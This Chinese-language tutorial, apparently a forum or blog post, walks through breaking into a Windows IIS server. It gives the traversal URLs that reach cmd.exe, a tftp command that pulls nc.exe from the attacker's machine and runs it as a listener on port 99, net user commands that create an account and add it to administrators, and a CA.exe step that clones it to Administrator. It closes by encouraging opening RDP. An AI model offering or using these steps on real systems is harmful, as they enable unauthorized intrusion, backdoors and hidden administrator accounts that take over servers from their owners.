如何得到系统最高权限

作者：永恒国度标签：电脑

阅读次数：70

某晚在榕哥的网站上看到榕哥写的一篇文章,关于客隆administratro的权限.我抱着学习的
态度想试一试.果然.成功了.. 嘿嘿.榕哥的东西就是好.再不怎么会有人说他的网站表示着国
内的网络安全呢. 以下是我的全部过程.我也不敢自已独吞啊.所以拿出来和大家一起分享喽.

入侵其实和炒菜一样.都得先备好料..反正我是这么理解的.(我可不是厨师哦)以下是我备的
料.

GetAccount.exe (榕哥的东西)
CA.exe (也是榕哥的东西
X-way2.5.zip (一个扫描软件)
tftpd32.exe (一个小巧的ftp服务器软件)
nc.exe (一个可以telnet到99端口的东西)
好了.下面开始吧..

第一步.

用X-way2.5扫描xxx.xxx.xxx.xxx发现xxx.xxx.xxx.xxx/scripts/..%255c..
%255cwinnt/system32/cmd.exe?/c+dir 哈哈.找到了..就这个吧.

第二步

运行tftpd32.运行之后你的机器就是一个ftp服务器了.回到你的浏览器，在地址栏里填入
http://xxx.xxx.xxx.xxx/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp -i
xxx.xxx.xxx.xxx GET nc.exe c:\\inetpub\\scripts\\nc.exe
然后等那么一小会就会传到主机c:\inetpub\scripts\目录了,这时我们要让主机运行nc.exe
xxx.xxx.xxx.xxx/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+c:\inetpub
\scripts\nc.exe

第三步

然后telnet xxx.xxx.xxx.xxx 99 呵呵...进来了吧. 下面我们建一个用户名为daoker口令
为daoker的用户.
net user daoker daoker /add
将daoker这个用户加入administrators组
net localgroup administrators daoker /add

第四步

下面利用CA.exe 将daoker克隆为Administrator
ca \\xxx.xxx.xxx.xxx test test daoker password

这时，daoker就成为了超级用户，并有具有和Administrator同样的设置,桌面、菜单等等。

是不是很爽啊.发果要是再开个3389什么的.是不是很爽啊...